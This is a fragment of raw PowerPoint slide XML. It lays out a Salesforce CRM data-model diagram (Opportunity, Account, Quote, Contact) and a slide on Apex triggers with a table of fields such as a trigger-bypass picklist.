            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2591" y="265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75" name="Oval 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2705" y="265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76" name="Oval 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2818" y="265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77" name="Oval 68"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2932" y="2652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278" name="AutoShape 69"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53263" idx="0"/>
              <a:endCxn id="53279" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="1579" y="1700"/>
              <a:ext cx="668" cy="122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79" name="Oval 70"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1255" y="1904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80" name="Oval 71"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3494" y="2148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81" name="Oval 72"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3494" y="2261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82" name="Oval 73"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3494" y="2374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83" name="Oval 74"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3494" y="2487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284" name="AutoShape 75"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53274" idx="0"/>
              <a:endCxn id="53280" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="2831" y="1988"/>
              <a:ext cx="464" cy="85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85" name="AutoShape 76"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53275" idx="0"/>
              <a:endCxn id="53281" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="2944" y="2102"/>
              <a:ext cx="351" cy="73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86" name="AutoShape 77"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53276" idx="0"/>
              <a:endCxn id="53282" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="3057" y="2215"/>
              <a:ext cx="238" cy="62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87" name="AutoShape 78"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53277" idx="0"/>
              <a:endCxn id="53283" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="3170" y="2329"/>
              <a:ext cx="125" cy="5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88" name="Text Box 79"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2972" y="2419"/>
              <a:ext cx="5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700" b="1"/>
                <a:t>Second Bidder</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53289" name="Text Box 80"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3121" y="2079"/>
              <a:ext cx="3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700" b="1"/>
                <a:t>End User</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53290" name="Text Box 81"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3176" y="2310"/>
              <a:ext cx="3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700" b="1"/>
                <a:t>Winner</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53291" name="Text Box 82"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="2192"/>
              <a:ext cx="2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700" b="1"/>
                <a:t>Buyer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="53292" name="AutoShape 83"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53340" idx="1"/>
              <a:endCxn id="53294" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="3949" y="1927"/>
              <a:ext cx="118" cy="10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93" name="AutoShape 84"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53264" idx="6"/>
              <a:endCxn id="53265" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4453" y="2204"/>
              <a:ext cx="22" cy="102"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 72272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diamond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94" name="Oval 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3903" y="2040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295" name="AutoShape 86"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53330" idx="1"/>
              <a:endCxn id="53328" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="1504" y="1927"/>
              <a:ext cx="3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96" name="AutoShape 87"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53330" idx="3"/>
              <a:endCxn id="53303" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3182" y="1927"/>
              <a:ext cx="426" cy="10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297" name="AutoShape 88"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53299" idx="0"/>
              <a:endCxn id="53306" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipV="1">
              <a:off x="2389" y="703"/>
              <a:ext cx="243" cy="2420"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -56792"/>
              </a:avLst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298" name="Oval 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1797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299" name="Oval 90"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1255" y="1797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300" name="AutoShape 91"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53342" idx="3"/>
              <a:endCxn id="53304" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2910" y="1541"/>
              <a:ext cx="925" cy="49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01" name="AutoShape 92"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53342" idx="1"/>
              <a:endCxn id="53298" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1006" y="1541"/>
              <a:ext cx="1224" cy="25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302" name="AutoShape 93"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53321" idx="3"/>
              <a:endCxn id="53305" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4174" y="2578"/>
              <a:ext cx="205" cy="68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303" name="Oval 94"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3562" y="2040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304" name="Oval 95"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3789" y="2040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305" name="Oval 96"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4333" y="2504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306" name="Oval 97"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3675" y="2040"/>
              <a:ext cx="91" cy="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3307" name="AutoShape 98"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53266" idx="4"/>
              <a:endCxn id="53321" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3277" y="3042"/>
              <a:ext cx="72" cy="36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308" name="Group 99"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1459" y="2759"/>
              <a:ext cx="680" cy="318"/>
              <a:chOff x="1429" y="2500"/>
              <a:chExt cx="680" cy="318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53343" name="Rectangle 100"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1429" y="2500"/>
                <a:ext cx="680" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect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Quote</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53344" name="Rectangle 101"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1429" y="2591"/>
                <a:ext cx="680" cy="227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Go NoGo</a:t>
                </a:r>
              </a:p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Amount</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53309" name="Group 102"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2230" y="1404"/>
              <a:ext cx="680" cy="182"/>
              <a:chOff x="2245" y="1275"/>
              <a:chExt cx="680" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53341" name="Rectangle 103"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2245" y="1275"/>
                <a:ext cx="680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Set Player</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53342" name="Rectangle 104"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2245" y="1366"/>
                <a:ext cx="680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0" name="Group 105"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4067" y="1790"/>
              <a:ext cx="975" cy="182"/>
              <a:chOff x="4626" y="1796"/>
              <a:chExt cx="975" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53339" name="Rectangle 106"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4626" y="1796"/>
                <a:ext cx="975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Product Pre-Qualification</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53340" name="Rectangle 107"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4626" y="1887"/>
                <a:ext cx="975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1" name="Group 108"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3493" y="2827"/>
              <a:ext cx="680" cy="182"/>
              <a:chOff x="3538" y="2568"/>
              <a:chExt cx="680" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53337" name="Rectangle 109"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3538" y="2568"/>
                <a:ext cx="680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Player</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53338" name="Rectangle 110"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3538" y="2659"/>
                <a:ext cx="680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2" name="Group 111"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="3377"/>
              <a:ext cx="975" cy="182"/>
              <a:chOff x="1134" y="3203"/>
              <a:chExt cx="975" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53335" name="Rectangle 112"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3203"/>
                <a:ext cx="975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Set-level Contact</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53336" name="Rectangle 113"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3294"/>
                <a:ext cx="975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3" name="Group 114"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2275" y="3377"/>
              <a:ext cx="975" cy="182"/>
              <a:chOff x="2245" y="3203"/>
              <a:chExt cx="975" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53333" name="Rectangle 115"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2245" y="3203"/>
                <a:ext cx="975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Buying Center Person</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53334" name="Rectangle 116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975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4" name="Group 117"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4226" y="3377"/>
              <a:ext cx="680" cy="182"/>
              <a:chOff x="4105" y="3203"/>
              <a:chExt cx="680" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53331" name="Rectangle 118"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4105" y="3203"/>
                <a:ext cx="680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Contact</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53332" name="Rectangle 119"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4105" y="3294"/>
                <a:ext cx="680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5" name="Group 120"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1822" y="1790"/>
              <a:ext cx="1360" cy="182"/>
              <a:chOff x="1134" y="3203"/>
              <a:chExt cx="975" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53329" name="Rectangle 121"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3203"/>
                <a:ext cx="975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Detailed Set Finance Information</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53330" name="Rectangle 122"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3294"/>
                <a:ext cx="975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  <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53316" name="Group 123"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="824" y="1790"/>
              <a:ext cx="680" cy="182"/>
              <a:chOff x="839" y="1819"/>
              <a:chExt cx="680" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53327" name="Rectangle 124"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="839" y="1819"/>
                <a:ext cx="680" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect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Opportunity Set</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53328" name="Rectangle 125"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="839" y="1910"/>
                <a:ext cx="680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Set Owner</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53317" name="Group 126"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3493" y="2033"/>
              <a:ext cx="975" cy="544"/>
              <a:chOff x="3378" y="1774"/>
              <a:chExt cx="975" cy="544"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53325" name="Rectangle 127"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3378" y="1774"/>
                <a:ext cx="975" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect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Account</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53326" name="Rectangle 128"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3378" y="1865"/>
                <a:ext cx="975" cy="453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Account Owner</a:t>
                </a:r>
              </a:p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Account Team</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53318" name="Group 129"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2275" y="2646"/>
              <a:ext cx="975" cy="545"/>
              <a:chOff x="2245" y="2386"/>
              <a:chExt cx="975" cy="545"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53322" name="Oval 130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68" cy="91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323" name="Rectangle 131"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2245" y="2386"/>
                <a:ext cx="975" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect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Opportunity</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53324" name="Rectangle 132"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2245" y="2477"/>
                <a:ext cx="975" cy="453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Opportunity Owner</a:t>
                </a:r>
              </a:p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Opportunity stage</a:t>
                </a:r>
              </a:p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Tender information</a:t>
                </a:r>
              </a:p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- Sales Team</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53319" name="Group 133"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3494" y="3122"/>
              <a:ext cx="680" cy="182"/>
              <a:chOff x="3810" y="1207"/>
              <a:chExt cx="680" cy="182"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53320" name="Rectangle 134"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3810" y="1207"/>
                <a:ext cx="680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/>
                  <a:t>Agreement</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53321" name="Rectangle 135"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3810" y="1298"/>
                <a:ext cx="680" cy="9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endParaRPr lang="en-GB" sz="900" b="1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CRM Trigger Map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42913" y="1509713"/>
            <a:ext cx="79311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4163" indent="-284163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01800" algn="l"/>
                <a:tab pos="2060575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:ea typeface="Gulim"/>
                <a:cs typeface="Gulim"/>
              </a:rPr>
              <a:t>Apex Code Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:ea typeface="Gulim"/>
              <a:cs typeface="Gulim"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54278" name="Picture 13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37290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AP12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="307293" name="Group 93"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1676400" y="4786313"/>
          <a:ext cx="5486400" cy="1517904"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1084263"/>
                <a:gridCol w="1416050"/>
                <a:gridCol w="1716087"/>
                <a:gridCol w="1270000"/>
              </a:tblGrid>
              <a:tr h="1936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Fields used for this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Field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Field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Bypass Apex Triggers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Bypass_Apex_triggers__c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Picklist multi-select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en-GB" sz="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Profile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Profile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Reference -&gt;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Opportunity</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="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Leading UCI Opportunity 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OwnerId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Quote__c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Opportunity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Opportunity__c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Lookup(Opportunity)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endParaRPr kumimoji="0" lang="en-GB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BU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BusinessUnit__c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Picklist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340" name="Group 55"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2057400"/>
            <a:ext cx="4648200" cy="900113"/>
